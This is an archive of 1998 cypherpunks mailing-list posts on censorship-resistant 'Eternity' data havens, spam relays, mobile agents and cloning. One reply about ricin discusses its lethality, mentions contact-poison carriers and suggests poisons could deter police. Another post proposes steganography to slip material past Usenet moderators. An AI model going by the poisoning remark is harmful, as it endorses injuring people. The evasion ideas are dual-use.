
> Date: Tue, 13 Jan 1998 18:55:24 -0700
> From: Jim Burnes <jim.burnes@ssds.com>
> Subject: Freedom Forum report (freedom of association)

> (It is left as an excercise to the reader to figure out why
> prohibition
> needed an amendment to the constitution while prohibition of
> other
> mind altering substances did not ;-)

What amazes me is that such groups as NORML and other pro-drug organizations
have not had their lawyers raise this issue. As far as I can tell nobody has
*ever* raised this issue in regards to the drug prohibitions.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@algroup.co.uk>
Date: Wed, 14 Jan 1998 05:20:49 +0800
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <199801131551.KAA23584@the-great-machine.mit.edu>
Message-ID: <34BBD8D8.94DBE073@algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Ryan Lackey wrote:
> BTW, I don't really like the overly negative names for Eternity, like
> "inferno", or whatever.  I like to think my data is *good* data, deserving
> of a better fate.  Elysium, perhaps?   Or just use "eternity"
> in place of "eternityspace" (a word I never should have used, since it means
> the same thing), as in "upload these files to eternity", "the collection
> of files currently stored in eternity", etc.  Little danger of confusion
> with pedestrian meanings of the word eternity, too, I think, and there
> is no real reason to draw a distinction between eternity the location for
> documents and eternity the overall system for creating such a space.

How about "perpetuity"? Nice and neutral. "Stored in perpetuity" is a
concept everyone understands, too. :-)

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686|Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org
and Technical Director|Email: ben@algroup.co.uk |Apache-SSL author
A.L. Digital Ltd,     |http://www.algroup.co.uk/Apache-SSL
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 14 Jan 1998 11:12:02 +0800
To: cypherpunks@toad.com
Subject: Re: unsolved billing problem
In-Reply-To: <06a0d1013010d18UPIMSSMTPUSR03@email.msn.com>
Message-ID: <J9y0ie11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"CLAUD W WELCH" <cww7595@email.msn.com> writes:

> I cancelled my membership prior to the end of two days. i would like a
> refund.

ME T00!!!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 14 Jan 1998 11:20:56 +0800
To: cypherpunks@toad.com
Subject: Re: (eternity) autonomous agents
In-Reply-To: <Pine.BSI.3.95.980113152218.18878E-100000@kizmiaz.dis.org>
Message-ID: <8gZ0ie12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



William Knowles <erehwon@dis.org> writes:
> If memory serves me right it was because Vince bounced off the Taxbomber
> site because it offered second passports, camouflage passports, and other
> products that was considered a fraud, Which to me sounds odd since there
> is some other company selling most everthing and then some from an .ai
> domain which Vince's company has the monopoly on handing out .ai domains

But that company was written about by some journalist, so Vince pulled
its plug to avoid bad publicity.

Vince also indicated (in response to my query) that he wouldn't support
content that provoked denial-of-service attacks (such as the Spanish
attack on the pro- basque independence web page0

> > As I said in my last piece on this subject, there is no security in
> > meatspace comparable to what is gotten with mathematics.
> >
> > --Tim May
>
> I agree completely, But there is still room for massively distrubted
> datahavens on oil rigs, barges, gun batteries, island nations or
> hiding in Norm's LAN in Cicero IL.  All the harder to supress that
> information.

Is it possible to make it cryptographically hard to determine where
the data is stored?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 07:29:10 +0800
To: rdl@mit.edu
Subject: Re: (eternity) autonomous agents
In-Reply-To: <199801131244.HAA22857@the-great-machine.mit.edu>
Message-ID: <199801132138.VAA00407@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Ryan Lackey <rdl@mit.edu> writes:
> You would be expected to comply with efforts to stamp out illegal
> activities.  Laws may be passed (e.g. CDA) which would require
> technical measures to prevent illegal activity even if you are a
> common carrier.

Governments are always trying to coerce people into complying with
technical measures designed by the likes of GCHQ, NSA, and various
government sell-outs.  Spammers have surived so far because spam is so
hard to stop; stopping SPAM is an inherently hard problem, mostly
because of open access SMTP relays which is basically a historic
accident, and also because spammers make use of accounts that it pays
them to treat as disposable.  (I like to think hashcash,
http://www.dcs.ex.ac.uk/~aba/hashcash/ is a viable solution for spam,
though it too must be widely deployed before it would be practical).

We can perhaps learn something from the services and environments
which allow spammers to flourish, we could emulate the lack of
authentication, and identification in SMTP protocols and
implementations, to design attractive new services which are hard to
police by design.

This is the advantage of the internet protocol designer.

Distributed web services as Ryan is prototyping is one attractive new
service.

The challenge is deployment.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 07:31:18 +0800
To: eternity@internexus.net
Subject: load balancing web proxy and server networks
Message-ID: <199801132146.VAA00420@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




We might also think about adding hot spot avoidance to distributed web
hosting mechanisms.  A distributed web space which distributed itself
to meet demand would be useful.  (An example of hot spots being
perhaps Dan Farmer's web site after he released Satan ... he switched
the web server off to stop his T1 being saturated, until the deluge
subsided).

An automatic load balancing distributed web server would be a kind of
next generation web proxy cacheing and mirroring scheme, dynamically
replicating and cacheing data to meet demand.  Robustness could be
improved also by the redundancy introduced.

Those browsing documents would pay for their web accesses at the
service rate they desired.  A market in web data would then give web
proxies / mirroring agents an economic incentive to automatically
replicate and migrate data.

Web caches already have some protection from various laws.


One other idea for an eternity service host we could leach off was
suggested to me by Ian Brown <I.Brown@cs.ucl.ac.uk>.  His suggestion
was that it would be nice if we could con proxy caches into cacheing
eternity web space for us.

One way to do this for example would be to actually host our own web
pages, but to configure our web server to only serve to a list of web
proxies -- anybody else would get access denied.  The .htaccess
mechanism would be sufficient for this purpose.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 14 Jan 1998 12:00:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Ricin AP
Message-ID: <199801140354.VAA01308@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
 
> This alert advises that nationwide trend among drug traffickers is to
> "bait" law enforcement officers with a white powder called RICIN.
> RICIN is a derivative of Castor beans and looks like powder
> methamphetamine. It is highly toxic and if it contacts human skin, it
> is fatal. The death process takes several days, depending upon the
> dosage, and is almost impossible to detect during an autopsy.
 
Ricin is a ribosome-inactivator, which inhibits protein synthesis at
the cellular level by binding to and damaging the 50S ribosomal
subunit.  This is eventually and irreversibly fatal, although not
immediately so, and the symptoms which occur in poisoned individuals
are generally misdiagnosed by internists as a wide variety of other
ailments.
 
The most famous case of the use of ricin was when Bulgarian dissident
Georgi Markow was assasinated by the KGB with an umbrella jab which
left a microscopic porous metal sphere tainted with ricin in his leg.
He died in agony a number of days later.
 
The lethal dose of ricin in humans is microscopic, and it is a poison
of choice in cancer therapy, since it destroys cells and patients are
unlikely to have previous immunological exposure to it.  It can be
bound to monoclonal antibodies, or other carriers, to target only
specific cells.
 
> Due to this situation, in the event of suspect drug seziures, do not
> come into direct skin contact with any powdered substances, and
> exhibit caution of field testing any powdered substances."
 
LOL!  Like one should come in contact with ANY unknown chemical
substance, powdered or not.  Remember that researcher who just died
after accidently getting a drop of Dimethyl Mercury on a gloved hand,
not to mention the one who got a speck in her eye and succumbed to
monkey herpes a couple of weeks later, despite intensive antiviral
therapy.  And that's not even mentioning other fun things like
Thallium, and Organophosphate nerve agents, or the use of cellular
penetrators like DMSO as carriers for contact poisons.
 
Ricin isn't the only nasty substance one could use to keep jackbooted
thugs out of the marijuana plants.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 14 Jan 1998 15:47:35 +0800
To: Blanc <cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.32.19980112191309.0069b3d8@cnw.com>
Message-ID: <3.0.5.32.19980113222020.0088f100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:14 PM 1/12/98 -0800, Blanc wrote:
> Mad Vlad wants to know:
>>something most anarchists here will deny is the existence of something
>>that could be called *immoral science*. is there such a thing? 
>............................................................
>
>No.  There are, however, immoral scientists.   One way to skew the

Depends.  [#invoke Godwin's Law]
Consider the Nazi studies done on human susceptibility to freezing,
poisons, torture, etc., and the followon work done by various
evil empires.  Some of it was just done for fun,
but some of it _was_ real science, with hypotheses and experiments,
and there's only so much research you can do into the
resistence of the body to serious damage without actually
damaging live bodies, most accidental damage to human bodies
isn't done in sufficiently instrumented environments to be useful,
and it's just _damn_ hard to get good volunteers these days.
Did most of that work rate as "immoral science" - I'd say so.

Now, some of it has uses outside the torture business,
but the primary customer of the work on freezing was the
nuclear bomber forces of some of the larger evil empires,
which wanted to know how much risk they could take
destroying their competitors' motherlands.  Sure, part of the goal
is to protect their employees, but even that is primarily to
increase their ability to destroy their enemies' civilians,
which is pretty morally dicey even if your enemy is evil.

A few users like oil companies have workers in the Arctic, and 
most moral organizations are more concerned about preventing accidents 
and minimizing risks to workers than getting away with
as much damage to their workers as they can; there are still
some legitimate uses of the knowledge like how to do medical
care for freezing-related accident victims, or extreme situations
like nuclear power-plant disaster cleanup.  But not a lot.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 14:38:34 +0800
To: Adam Back <phelix@vallnet.com
Subject: Re: (eternity) mailing list and activity
In-Reply-To: <34b9a145.15127288@128.2.84.191>
Message-ID: <v03102800b0e209877c39@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:26 PM -0800 1/13/98, Adam Back wrote:
>phelix@vallnet.com writes:
>> On 11 Jan 1998 18:48:24 -0600, Adam Back <aba@dcs.ex.ac.uk> wrote:
>> [secret splitting eternity data on servers]
>>
>> What prevents the operator of such a server from being charged with
>> "conspiracy to provide child porn" or whatever?
>
>I expect so.  I also expect the spooks will be the ones submitting the
>child porn to the service.
>
>> If he is holding a portion of such contraband, isn't he as liable as
>> if he was holding the whole article(s)?
>
>RICO may make holding a portion worse than the whole thing as it may
>then be construed as a conspiracy, RICO allowing asset forfeiture.


This is why I favor systems where there is no way to localize the holder of
data.

I'm unpersuaded that any of the Eternity proposals avoid this. If _any_
site holding data is localized (traced, identified), it _will_ come under
legal, financial, or physical attack.

If a "network of nodes" is the server, that network and any identifiable
nodes in it will be attacked. It doesn't matter whether the precise server
of a precise piece of data can be pinpointed. (Think of the Gestapo, the
Inquisition, the Ayotollah, the BATF, and ask whether they would care if
the exact machine had been isolated?)

(Dangers of Eternity servers, a note: Also, the developers of such nodes,
and such software, will be major targets, no matter where they live. In
fact, how will source code for Eternity nodes be checked? It's hard enough
checking PGP source code, and no one even bothers to try to check remailer
source code for backdoors, bugs, etc. (no impugning of Mixmaster, but I see
no mention of people checking it, etc.). My point is a simple one: even if
Ryan Lackey leaves the country, as he says he plans to do, various entities
will probably either harass him, or, more ominously, get him to modify the
source code, to put "barium" in it, and all sorts of such things. Just a
thought.

Until I see proof that these suspicions are wrong, I can't get excited
about any of the Eternity schemes.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 14:42:27 +0800
To: platypus@acmeonline.net
Subject: Re: (eternity) Re: mirroring services, web accounts for ecash
In-Reply-To: <v03102805b0e09252f52e@[207.167.93.63]>
Message-ID: <v03102801b0e20c09130e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:30 PM -0800 1/13/98, ? the Platypus {aka David Formosa} wrote:

>You know, I think we have been missing one use for eternerty services.
>Its a cheap reliable off site backup system.  You simply encrypt your
>data, and throw it into the system.

Bandwidth.

Think about it. Most of us are backing up on DATs or CD-ROMs. But our Net
connections are running at 30-50 KB/sec. Do some quick calculations!

Plus, Bandwidth Part II: When N people begin using Eternity for this kind
of backup....

In any case, this was discussed a few years ago, so we're not "missing"
this use.

(Gelernter's Linda system touched on similar uses.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 14:47:52 +0800
To: Adam Back <ravage@ssz.com
Subject: Re: plan 9 features (Re: autonomous agents (fwd))
In-Reply-To: <199801122044.OAA22802@einstein.ssz.com>
Message-ID: <v03102802b0e20d676575@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:33 PM -0800 1/13/98, Adam Back wrote:

>Java has a lot going for it as a candidate due to portability and code
>distribution support.  I think the only thing missing from java is the
>bidding and scheduling mechanisms.  Your other forwarded message on
>plan 9 looks interesting also.

I haven't checked on them in the last few months, but "Electric
Communities" (www.communities.com) was doing some interesting work on
adding security and market mechanism extensions to Java, in a superset
language they called "E."

Many Cypherpunk list members, past and present  worked on aspects of this,
including Chip Morningstar (one of the founders), Doug Barnes, Norm Hardy,
Bill Frantz, Mark Miller, etc. They can speak up and say more.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 07:31:00 +0800
To: tcmay@got.net
Subject: Re: steganography and delayed release of keys (Re: EternityServices)
In-Reply-To: <v03102803b0e08ed02241@[207.167.93.63]>
Message-ID: <199801132241.WAA00454@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net>
> At 6:46 PM -0800 1/12/98, Adam Back wrote:
> >One tactic which could protect a USENET newsgroup operator from child
> >porn prosecutions is if he had no practical way to recognize such
> >materials until after it was distributed to down stream sites.
> 
> Who are these "USENET newsgroup operators," anyway? (A few newsgroups are
> moderated, by individuals or committees, but the vast majority are not.)

I meant USENET site operators (so that would be administrators plus
the people who decide policy).  

Even moderation need not be a fatal problem with steganography, if we
post the key to decrypt the stego encoded message after the article
has had a chance to be distributed.  (And presuming that our mimic
function is good enough to fool the moderator.)

For unmoderated groups, we have a much easier task: that of avoiding
undue attention or cancellations until the message has propagated.

> Newsgroups get removed from university and corporate newsfeeds, or by
> nations, and Adam's ruse would not stop them from continuing to do so.

In the extreme we can try to use mimic functions to post textual
information seemingly on charter for whatever groups are remaining at
a given time.  Binary data is obviously much easier to hide data in,
but is in any case a natural target for omitting from feeds due to
volume.

Unfortunately good quality textual steganography encodings are I think a
hard problem for reasonable data rates.  One advantage in our favour is the
massively noisy and incoherent garbage which forms the majority of USENET
traffic.  Plausibly mimicing an alt.2600 or warez d00d message, or a
`cascade' seems like an easier target.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 07:30:36 +0800
To: eternity@internexus.net
Subject: metrics of eternity service properties
Message-ID: <199801132316.XAA00505@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net> writes:
> >> This of course doesn't scale at all well. It is semi-OK for a tiny,
> >> sparse set of reposted items, but fails utterly for larger database
> >> sets. (If and when Adam's reposted volumes begin to get significant,
> >> he will be viewed as
> >> a spammer. :-) )
> >
> >The best criticism of my eternity design to date!  I agree.
> 
> I assume you are serious, and do agree, as it is a very solid
> criticism of the "Eternity as continuous posting to Usenet" model.

Yes.  I think my eternity service in USENET is actually fairly
resistant to attackers determining readers and publishers.  The
limiting factor is the bandwidth consumed.  We have to keep below some
threshold otherwise news admins may attempt to filter out eternity
articles; and there is some limit at which the system would break down
altogether.

One suspects posting more than around 10Mb-20Mb / day would be enough
to motivate administrators to start filtering.  Some people with
questionable motivation also have made something of a sport of sending
forged cancel messages, and these people will be more easily
motivated, as as far as I can tell their motivation is a perverse
enjoyment of censorship, and sense of self importance, and of malice
in perpetrating DoS attacks.

> I see several axes to the analysis of the various Eternity schemes.
> 
> -- retrieval time for a customer or client to obtain some set of data,
> ranging from (I assume) ~minutes or less in an Eternity DDS file system to
> ~days or less in a Blacknet system to (I am guessing) ~weeks or months in
> an Adam Back sort of system.

Actually I was aiming for seconds access time with "Eternity USENET".
(I am going to dub it "Eternity USENET" -- just any name -- because
the lack of names to denote the services under discussion is becoming
awkward.)

However the reason I am able to claim seconds is because I aim to keep
the data either in the newspool, or in a local copy of recent messages.

The design is similar to TELETEXT, the text mode information services
hosted as side bands on TV signals.

The basic topology is the same: we have a broadcast medium, data is
slowly re-broadcast.  So my design is fairly analogous to a FAST-TEXT
system, which keeps a copy of all the pages, and updates them as the
TEXT signal sweeps past.

So metrics we could use to describe the functionality of an eternity
design should include "update time", and "access time".  I'll try a
quick table of this to illustrate my understanding of Eternity
BlackNet (BlackNet used to host an Eternity like service), and
Eternity DDS as compared to Eternity USENET.


                            E-BlackNet     E-USENET       E-DDS

update delay                2-3 days	   2-3 days       minutes
access time                 2-3 days       seconds        minutes
b/width efficiency          good/          poor           intermediate
                            intermediate
nodes                       10             10,000         10,000
capacity                    100 Gb         100 Mb         10 Tb
security                    good           good           intermediate
security dependencies       remailers,     remailers,     custom 
                            USENET         USENET         componenets
ease of deployment          easy           easy           hard

Clearly these figures are order of magnitude only, if even that
accurate.

My reasoning is as follows:

Eternity BlackNet:

I am presuming we have third party BlackNet operators who offer to buy
and sell information, acting as distribution agents.  It takes around
a day to send requests or submissions to the operator via a dead drop
(encrypted material posted to USENET via remailer).

If requested information is sent to clients via replyable nyms
bandwidth efficiency is improved.  If information is sent to clients
via dead drops efficiency drops because the information is broadcast
for each request.

Clearly a user could, if he wished to improve his access time for
browsing BlackNet eternity documents, replicate the entire BlackNet
database locally.  (Or perhaps subsets defined as all documents by a
chosen set of authors, or all documents with given keywords, or with a
given third party rating etc).

E-USENET:

This involves re-posting documents periodically to USENET, and relying
on the small data set size to ensure that local eternity proxies can
retain a current copy of the dataset.

Variants on this approach can migrate towards E-DDS approach by using
publically accessible E-USENET servers, and by E-USENET server caches
sharing their then larger document store.  Also by adding other
submission mechanisms to the pool formed by the set of publically
accessible E-USENET services.

E-DDS:

Economic incentives are used to encourage people to take risks in
hosting controversial documents.  Indirection is used to have a hidden
set of data servers, which are only accessed via publically known
gateways.  (I would recommend looking at Ian Goldberg and David
Wagner's TAZ server, the url for which I posted in an earlier post,
for this indirection function).

I am unsure how an attacker would be prevented from discovering the
hidden set of data servers.  How do we exclude the attacker from
becoming a gateway server?

I get the impression that the idea also is make the service a
commercial success as a distributed web hosting system, and to get
away with comparitively small amounts of controversial materials which
migrate.  This idea is a useful model I think.

Comments?  Clarifications, Ryan?

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 07:28:38 +0800
To: eternity@internexus.net
Subject: mobile agents paper
Message-ID: <199801132319.XAA00514@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Nelson Minar <nelson@media.mit.edu> pointed out in email to me the
relevance of his thesis proposal and paper "Computational Media for
Mobile Agents" to the discussion on autonomous agents as a means to
deploying eternity servers and remailers etc.

	http://www.media.mit.edu/~nelson/

(Not read it yet).

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Wed, 14 Jan 1998 16:19:04 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
In-Reply-To: <199801131602.RAA06619@basement.replay.com>
Message-ID: <v0311073ab0e21842b364@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



I wonder if it is the intention of those who support a ban on human cloning
to prevent my friend who lost his forearm in the Vietnam War from having a
new one grown and attached?


-------------------------------------------------------------------------
Bill Frantz       | One party wants to control | Periwinkle -- Consulting
(408)356-8506     | what you do in the bedroom,| 16345 Englewood Ave.
frantz@netcom.com | the other in the boardroom.| Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter trei" <ptrei@hotmail.com>
Date: Wed, 14 Jan 1998 16:28:47 +0800
To: cypherpunks@toad.com
Subject: Neat quote from Ron Rivest
Message-ID: <19980114075735.18375.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



At the RSA Data Security Conference:

"There are probably more people in this room working on crime
*prevention* than in the entire Federal Government."

-- Ron Rivest

quoted (hopefully correctly) by Peter Trei
ptrei@hotmail.com

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 16:28:49 +0800
To: William Knowles <erehwon@dis.org>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <v03102804b0e1a0b6d21b@[207.167.93.63]>
Message-ID: <v03102803b0e223c5a695@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:51 PM -0800 1/13/98, William Knowles wrote:

>Isn't there a microstate off the coast of England called 'Sealand' run
>from a former oil rig/gun battery for the last 20 years?

What Lucky said.

(And read up on the scam ^H^H^H^H scheme called "Oceania," the floating
libertarian non-state. And Minerva, and so on.)

....
>I agree completely, But there is still room for massively distrubted
>datahavens on oil rigs, barges, gun batteries, island nations or
>hiding in Norm's LAN in Cicero IL.  All the harder to supress that
>information.

"Room for," certainly. "Economic incentive for," apparently not.

Look, if you can wave a magic want and give us "massively distributed data
havens on oil rigs, barges,....," I'll be the first to cheer.

But the factors I described, and Lucky described, are why it would be a
foolish investment for anyone to build even the first one, let alone the
numbers you are contemplating.

Wishing won't make it so.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 08:41:38 +0800
To: phelix@vallnet.com
Subject: Re: (eternity) mailing list and activity
In-Reply-To: <34b9a145.15127288@128.2.84.191>
Message-ID: <199801140026.AAA00469@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




phelix@vallnet.com writes:
> On 11 Jan 1998 18:48:24 -0600, Adam Back <aba@dcs.ex.ac.uk> wrote:
> [secret splitting eternity data on servers]
> 
> What prevents the operator of such a server from being charged with
> "conspiracy to provide child porn" or whatever?  

I expect so.  I also expect the spooks will be the ones submitting the
child porn to the service.

> If he is holding a portion of such contraband, isn't he as liable as
> if he was holding the whole article(s)?

RICO may make holding a portion worse than the whole thing as it may
then be construed as a conspiracy, RICO allowing asset forfeiture.

Alternatively holding a portion makes it more difficult for the
attacker to determine who the holders are, and to mount a
multi-jurisdictional attack (eg seizing disks in multiple countries).

Not sure how it would work out in practice.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Wed, 14 Jan 1998 13:45:46 +0800
To: cypherpunks@toad.com
Subject: TLS implementations
Message-ID: <a5885eb6176a753c1dad1eba54afc7d9@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain




Don't you know the place where there is anyone
TLS implementations (source code)?
Teach to me if it is here because it is known.
Thank you very much.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 14 Jan 1998 08:41:42 +0800
To: ravage@ssz.com
Subject: plan 9 features (Re: autonomous agents (fwd))
In-Reply-To: <199801122044.OAA22802@einstein.ssz.com>
Message-ID: <199801140033.AAA00495@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
> > Adam Back <aba@dcs.ex.ac.uk>
> > > [autonomous agents, markets for CPU time, disk, comms]
> 
> Has anyone done any work that you are aware of under the Plan 9 os?
> With it's fundamental seperation of i/o, process, and file servers
> along with it's inherent bidding/scheduling mechanism it seems to me
> that a lot of this work has already been done. In addition there are
> programs that allow Linux boxes to participate as Plan 9 compliant
> file servers.

Sounds interesting.  I am not familiar with plan 9 besides the
enthusings of a colleague reminiscing about the work done at York
Univ, UK with plan 9.

Java has a lot going for it as a candidate due to portability and code
distribution support.  I think the only thing missing from java is the
bidding and scheduling mechanisms.  Your other forwarded message on
plan 9 looks interesting also.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 14 Jan 1998 16:58:46 +0800
To: The Sheriff <sheriff@speakeasy.org>
Subject: Re: Spam
In-Reply-To: <19980111.045850.4894.7.Lord_Buttmonkey@juno.com>
Message-ID: <3.0.5.32.19980114004615.00896100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:02 PM 1/11/98 -0400, The Sheriff wrote:
>My interest isn't simply in getting rid of the spam.  "Empty
>Trash" is a pretty simple concept on Eudora.  What I want to do
>is fight the flow -- and while there may be as many as 10 spammers
>per ISP out there, every spam I do something about is one less
>server that accepts messages for routing that don't come from one
>of their accounts.

There's some interesting technical work being done at maps.vix.com,
by Paul Vixie and friends.  They've got a Realtime Blackhole List
server which kills any email coming from any site they know that
permits third-party smtp relays.  They're a bit on the aggressive side
(their current implementation doesn't provide a convenient
local override list, so if you install their system in your
sendmail.cf, you lose email from anybody they block until
_they_ decide the site has rehabilitated itself.)
I learned about them the hard way (they blackhole ix.netcom.com,
so my mail to the pgp-users list now gets rejected.  Sigh.)
Their web page says they'd rather throw out a few extra babies
to get rid of all this excess bathwater.  After all, 
they're not just killing spam, they're killing all mail
you receive from any system that's easy to spam through,
whether it's spam or not.

Getting rid of third-party relays is a good start, and you don't
need to get rid of _all_ of them to make spamming much harder;
if you convince most of the big internet services to turn them off,
you force the spammers to go searching for relays, which is not
only more work, but if there are a number of trap systems waiting
for them they may get caught.

Losing third-party relay is rather a shame - the Internet used to
be a cooperative system where everybody tried to get mail through,
and avoiding third-party relay is more complex if your users
have lots of different domain names (e.g. www.foo.com hosted at
bigisp.net).  It also pushes the net more in the direction of
all mail needing to have True Names, which is a Bad Thing,
and decreases robustness of the overall system.  Personally,
I've found it more trouble now that my employer doesn't do
third-party relay, since I need different configurations for
Eudora and Netscape Mail depending on whether my laptop is 
on the LAN at work or dialed into my ISP from home 
(Win95 IP appears to be too dumb to let me configure a hosts file 
that points "mailhost" to the appropriate IP address,
and Netscape seems to keep all its options in the Registry
rather than accepting command-line options like Eudora does.)

Another approach to reducing spam is of course to keep contacting
ISPs to kill off bad users, and to get ISPs to refuse spamhauses
as customers.
				Thanks! 
					Bill
